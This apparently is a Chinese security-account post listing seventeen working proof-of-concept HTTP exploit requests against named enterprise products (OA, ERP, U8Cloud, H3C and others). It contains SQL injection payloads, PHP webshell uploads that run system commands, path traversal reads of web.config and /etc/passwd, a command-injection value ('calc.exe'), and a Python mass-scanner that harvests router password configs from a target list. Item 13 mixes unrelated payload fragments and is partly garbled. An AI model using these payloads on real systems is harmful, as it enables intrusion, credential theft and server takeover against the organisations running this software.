Disclaimer
This article is intended for technical study and discussion only. Do not use the content or related techniques provided here for illegal activities. Any direct or indirect consequences or losses arising from the dissemination or use of the content or tools provided in this article are the sole responsibility of the user; any adverse consequences have nothing to do with the author or this account. This test is for learning purposes only. If there is any dispute over the content or any infringement, please message us promptly; we will delete it immediately and apologize. Thank you!
1. 金慧综合管理信息系统 SQL injection vulnerability
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
2. 金和 OA C6 GeneralXmlhttpPage.aspx SQL injection vulnerability
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
3. 百易云资产管理运营系统 arbitrary file upload
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050
----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
4. 天问物业 ERP 系统 ContractDownLoad arbitrary file read vulnerability
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
5. 天问物业 ERP 系统 AreaAvatarDownLoad.aspx arbitrary file read vulnerability
/HM/Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
6. 用友 U8Cloud ActionServlet SQL injection
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
7. 用友 NC UserAuthenticationServlet deserialization vulnerability
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Length:
Malicious serialized data
8. 用友 U8cloud MeasQueryConditionFrameAction interface SQL injection vulnerability
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9. WVP video platform (GB28181) unauthenticated SQL injection vulnerability
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
10. 华磊科技物流 getOrderTrackingNumber SQL injection vulnerability
GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
11. 通达 OA V11.10 login.php SQL injection vulnerability
POST /ispirit/interface/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'
12. 创客13星零售商城系统 front-end arbitrary file upload vulnerability
POST /Login/shangchuan HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/Login/shangchuan
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundaryBP56KuZOdlY4nLGg
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryBP56KuZOdlY4nLGg--
13. 明源云 ERP ApiUpdate.ashx interface file upload vulnerability
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: target.com
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
14. H3C password disclosure vulnerability
import requests
import urllib3
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

payload = '/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg'
invalidkey = "home.asp"

with open('target.txt', 'r') as f:
    for target in f:
        target = target.strip()  # drop the trailing newline from each line
        if not target:
            continue
        url = target + payload
        # print('target:', url)
        try:
            req = requests.get(url, verify=False)
        except requests.RequestException:
            continue  # skip unreachable targets instead of reusing a stale response
        if req.status_code == 200:
            if invalidkey not in req.text:
                parsed = urlparse(url)
                with open(str(parsed.hostname) + '.' + str(parsed.port) + '.txt', 'w') as w:
                    w.write(req.text)
                print('[+] Target: ' + target + ' is Vulnerability')
15. Bazarr swaggerui component directory traversal leading to arbitrary file read vulnerability
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
16. 宏脉医疗 DownLoadServerFile arbitrary file read/download vulnerability
POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
filePath=c:\windows\win.in
17. 科讯校园一卡通管理系统 dormitoryHealthRanking SQL injection vulnerability
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Follow the WeChat official account: 实战安全研究